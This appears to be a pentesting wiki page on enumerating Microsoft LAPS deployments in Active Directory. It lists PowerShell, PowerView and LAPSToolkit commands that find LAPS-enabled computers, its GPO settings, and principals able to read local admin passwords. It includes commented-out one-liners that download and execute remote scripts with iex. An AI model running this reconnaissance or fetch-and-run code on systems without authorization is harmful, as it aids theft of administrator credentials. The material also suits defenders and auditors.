LAPS

Theory

The "Local Administrator Password Solution" (LAPS) provides management of local account passwords of domain joined computers. Passwords are stored in Active Directory (AD) and protected by ACL, so only eligible users can read it or request its reset.

This page is about enumeration, you may have a look on LAPS-based attacks and LAPS-based persistences.

Practice

Check If Activated

We can check if LAPS is installed by enumerating related files and folders

# Identify if installed to Program Files
# PowerShell
Get-ChildItem 'C:\Program Files\LAPS\CSE\'
Get-ChildItem 'C:\Program Files (x86)\LAPS\CSE\'

#Cmd
dir 'C:\Program Files\LAPS\CSE\'
dir 'C:\Program Files (x86)\LAPS\CSE\'

We can guess if LAPS is installed by checking the LAPS AD Object:

#ActiveDirectory PowerShell module (RSAT)
#iex (new-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/ADModule/master/Import-ActiveDirectory.ps1');Import-ActiveDirectory
Get-ADObject 'CN=ms-mcs-admpwd,CN=Schema,CN=Configuration,DC=DC01,DC=Security,CN=Local'

#PowerView
#IEX(IWR -usebasicparsing https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1)
Get-DomainObject -SearchBase "LDAP://DC=domain,DC=local" | ? { $_."ms-mcs-admpwdexpirationtime" -ne $null } | select DnsHostname
Get-DomainObject "CN=ms-Mcs-AdmPwd,CN=Schema,CN=Configuration,DC=domain,DC=local"

#PowerView
# Find computers where the expiration time is not empty, any user can read this
Get-DomainComputer | ? { $_."ms-Mcs-AdmPwdExpirationTime" -ne $null } | select dnsHostName

We may enumerate if LAPS is installed by checking GPOs with PowerView.

#PowerView
# Find GPOs that have "LAPS" or some other descriptive term in the name
Get-DomainGPO | ? { $_.DisplayName -like "*laps*" } | select DisplayName, Name, GPCFileSysPath | fl
Get-DomainGPO | ? { $_.DisplayName -like "*password solution*" } | select DisplayName, Name, GPCFileSysPath | fl

If you find a GPO, you can resolve computers linked to this GPO as follow

Get-NetOU -GUID "{DDC640FF-634A-4442-BC2E-C05EED132F0C}" | % {Get-NetComputer -ADSpath $_}

We can check if LAPS is installed by enumerating related registries

#Powershell
Get-ItemProperty -Path "HKLM:\Software\Policies\Microsoft Services\AdmPwd" -Name AdmPwdEnabled

#Cmd
reg query "HKLM\Software\Policies\Microsoft Services\AdmPwd" /v AdmPwdEnabled

The LAPSToolkit is a tool to audit and attack LAPS environments. We may use following commands to enum computers which have LAPS enabled.

# Import LAPSToolkit
. .\LAPSToolkit.ps1

# Gets all computers which have LAPS enabled
Get-LAPSComputers

LAPS GPO Configuration

By reading the GPO configuration file, you may retreive following informations: Password complexity, Password length, Password chage frenquency, the LAPS managed account name, and password expiration protection policy.

If LAPS is deployed by GPO, we can identify the configuration file to discover some details about the configuration.

Get-Content "<GPCFileSysPath>\Machine\Registry.pol"

After downloading the GPO registry.pol file which location is at the gpcfilesyspath obtained while enumerating GPOs, we can useParse-PolFile from GPRegistryPolicyParser and obtain LAPS related informations.

Parse-PolFile "Registry.pol"

LAPS Read Password Access

You may enumerate principals that can read the LAPS password on given systems by using Powerview, admpwd.ps, or even adsisearcher.

We can enumerate who can read the LAPS password using Powersploit's Powerview.

# Find the principals that have ReadPropery on ms-Mcs-AdmPwd for a giver computer
Get-AdmPwdPassword -ComputerName computer01 | fl

# Find the principals that have ReadPropery on ms-Mcs-AdmPwd for each computers
Get-DomainComputer | Get-DomainObjectAcl -ResolveGUIDs | ? { $_.ObjectAceType -eq "ms-Mcs-AdmPwd" -and $_.ActiveDirectoryRights -match "ReadProperty" } | ForEach-Object { $_ | Add-Member NoteProperty 'IdentityName' $(Convert-SidToName $_.SecurityIdentifier); $_ }

# Find the principals that have ReadPropery on ms-Mcs-AdmPwd for each OU
Get-DomainOU | Get-DomainObjectAcl -ResolveGUIDs | Where-Object {($_.ObjectAceType -like 'ms-Mcs-AdmPwd') -and ($_.ActiveDirectoryRights -match 'ReadProperty')} | ForEach-Object { $_ | Add-Member NoteProperty 'IdentityName' $(Convert-SidToName $_.SecurityIdentifier); $_ }

We can enumerate who can read the LAPS password using admpwd.ps (LAPS PowerShell module). You can check if it's installed as follow:

#Check if LAPS Powershell module is installed
#By enumerating files
Get-ChildItem "C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AdmPwd.PS"

#By enumerating commands
Get-Command *AdmPwd*

To enumerate, use following commands

# Find the principals that have ReadPropery on ms-Mcs-AdmPwd for a given OU
Find-AdmPwdExtendedRights -Identity <OU> | fl

The LAPSToolkit is a tool to audit and attack LAPS environments. We may use following commands to enum users that can read LAPS passwords.

Find-LAPSDelegatedGroups will query each OU and find domain groups that have delegated read access. Find-AdmPwdExtendedRights goes a little deeper and queries each individual computer for users that have "All Extended Rights". This will reveal any users that can read the attribute without having had it specifically delegated to them.

# Get Groups that can read the ms-Mcs-AdmPwd attribute
Find-LAPSDelegatedGroups

# Checks for ExtendedRights for Laps on each AD Computer
Find-AdmPwdExtendedRights

Resources

LAPSPentest Everything

LAPS - Part 1https://buaq.net

LAPSHackTricks

Last updated 9 months ago